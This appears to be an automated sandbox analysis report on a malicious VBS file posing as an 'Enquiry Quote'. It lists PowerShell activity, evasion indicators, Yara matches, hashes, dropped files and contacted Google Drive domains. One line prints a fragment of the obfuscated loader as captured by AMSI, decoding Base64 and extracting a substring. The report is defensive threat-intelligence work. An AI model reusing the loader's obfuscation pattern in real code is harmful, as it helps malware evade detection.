Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Skidoo)$global:Indskudsstningers = [System.Text.Encoding]::ASCII.GetString($Involverede)$global:Nematocyst=$Indskudsstningers.substring($Tilvendelsens237,$Urocentrummets)<#Driftsresu

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFAAC135479 push ebp; iretd	15_2_00007FFAAC135538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_04A8EC78 pushfd ; retf	19_2_04A8EC79
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_04A817DF push ebx; ret	19_2_04A8189A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_04A8188C push ebx; ret	19_2_04A8189A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_076C30AB push dword ptr [ebp+ebx-75h]; iretd	19_2_076C30B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_076C1D28 push eax; mov dword ptr [esp], ecx	19_2_076C21B4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5009	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4838	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6793	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2950	Jump to behavior

Source: C:\Windows\System32\wscript.exe TID: 5892	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1340	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6092	Thread sleep count: 6793 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1252	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1056	Thread sleep count: 2950 > 30	Jump to behavior

Source: wscript.exe, 00000000.00000003.1272521798.000001BBF8142000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1264409533.000001BBF9FE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1267175366.000001BBF9FE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1263586854.000001BBF9FE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1272148773.000001BBF9FE3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2559116933.000000000777F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1263586854.000001BBF9FC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1272148773.000001BBF9FC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1264409533.000001BBF9FC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1267175366.000001BBF9FC4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW)
Source: powershell.exe, 0000000F.00000002.2642359454.000001FAE72FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: Yara match	File source: amsi64_8084.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3024, type: MEMORYSTR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.217.16.193	drive.usercontent.google.com	United States		15169	GOOGLEUS	false
216.58.206.46	drive.google.com	United States		15169	GOOGLEUS	false

Name	IP	Active
drive.google.com	216.58.206.46	true
drive.usercontent.google.com	172.217.16.193	true

ID:	1466658
Product:	CloudBasic
Start time:	08:51:46
Start date:	03.07.2024
Sample:	Enquiry Quote - 24071834-01.vbs
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	9e2fe2b97264a9c35794d67e1c17ee26
SHA1:	3d32f6f565e50eeeba893e7734a860b7bc45a1d4
SHA256:	d692bbec767a90d323a15ef761c1a207480f417ffd1509717e1b6793c0b7299a
Filetype:	Visual Basic Script (13500/0) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression	49AEBF8CBD62D92AC215B2923FB1B9F5	1723BE06719828DDA65AD804298D0431F6AFF976	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	data	23176B4BE747FB4BC0BF6360ED4F8E6E	CFE8E662ECE99256BAFEC26AF4DCDBF02E2961A4	7BC5E85F341758F6BE52D4C59D65AA46AE1557FC634921C7790FE43940819207
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	DD89E182EEC1B964E2EEFE5F8889DCD7	326A3754A1334C32056811411E0C5C96F8BFBBEE	383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1mnjqzuy.bve.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmb5p4uc.t0y.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ezv0ptqm.sa1.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vlfoliuw.vdt.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\Woes.uds	ASCII text, with very long lines (65536), with no line terminators	E045DCE2B497F738701AACE12F084813	1B6D8A40B81D9E1B79C82E9BCC31D312E7BA87A0	11ACB75B44152ED40AEB5F759678D16928862D7CE8E1132C5B0005982EAF2872

Windows Analysis Report Enquiry Quote - 24071834-01.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Windows Analysis Report
Enquiry Quote - 24071834-01.vbs

Malware Threat Intel
Provided by